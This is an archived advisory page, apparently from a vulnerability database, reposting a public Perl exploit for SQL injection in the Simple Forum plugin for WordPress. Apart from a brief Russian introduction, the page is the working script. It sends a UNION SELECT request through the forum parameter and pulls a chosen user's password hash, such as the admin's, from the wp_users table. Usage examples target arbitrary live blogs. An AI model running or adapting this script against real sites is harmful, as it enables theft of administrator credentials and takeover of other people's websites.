Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18173
HistoryOct 12, 2007 - 12:00 a.m.

Simple Forum (for WordPress) sql-inject exploit (public version)

2007-10-1200:00:00
vulners.com
8

Добрый день. Я нашел уязвимость в форме Simple Forum для движка WordPress.
Решил первыми осведомить вас! :)
Через пару минут буду отсылать на milw0rm


#!/usr/bin/perl

use IO::Socket;

if (@ARGV <4)
{
print q(
###############################################################################

Simple Forum (for WordPress) sql-inject exploit (public version)
Tested on SF version 1.0, 1.1, 1.9 and WordPress 2.1.0, 2.1.1, 2.1.2
This exploit gives you selected user passwd hash,
for more features use Private Version
Discovered and coded by FrenzY ( [email protected])

— Public Version —

params:
[URL] - URL of web-site
[DIR] - Directory where WordPress is installed
[USER ID] - 1 for admin user
[PAGE ID] - ID of the page where forum is located

ex: if http://www.somefuckingblog.com/?page_id=3

cmd> perl simpleforum_wp.pl http://www.somefuckingblog.com / 1 3 > sfb.txt
(i recomend to use file output, because result may be non-readable from the
CMD :-))

###############################################################################
);
exit;
}

###############################################################################

$serv = $ARGV[0];
$dir = $ARGV[1];
$uid = $ARGV[2];
$pid = $ARGV[3];

$serv =~ s/(http:\/\/)//eg;

print "\r\n";
print "We are going to make a sql-inject at $serv now\r\n";
print "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

          • -\r\n";

$path = $dir;
$path .= '?page_id=';
$path .= $pid;
$path .=
'&forum=1%20and%201=0%20UNION%20SELECT%201,user_pass,3,4,5,6,7%20FROM%20wp_users%20WHERE%20ID=';

$path .= $uid;

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv",
PeerPort => "80") || die "[-] CONNECT FAILED :-(\r\n";

print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: /\n";
print $socket "Connection: close\n\n";

$i = 0;

while ($answer = <$socket>)
{
if ($answer =~ /Currently Online/) { print "- - - - - - - - - - - - - - - -

                                                • -\r\n"; exit(); }
                                                  if ($i == 1) { print " result: $answer"; }
                                                  if ($answer =~ /arrowr.png" alt=""/) { $i = 1; }
                                                  }

print "[-] EXPLOITING FAILED :-( \r\n";
print "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

          • -\r\n";

EOF



Love,
Ivan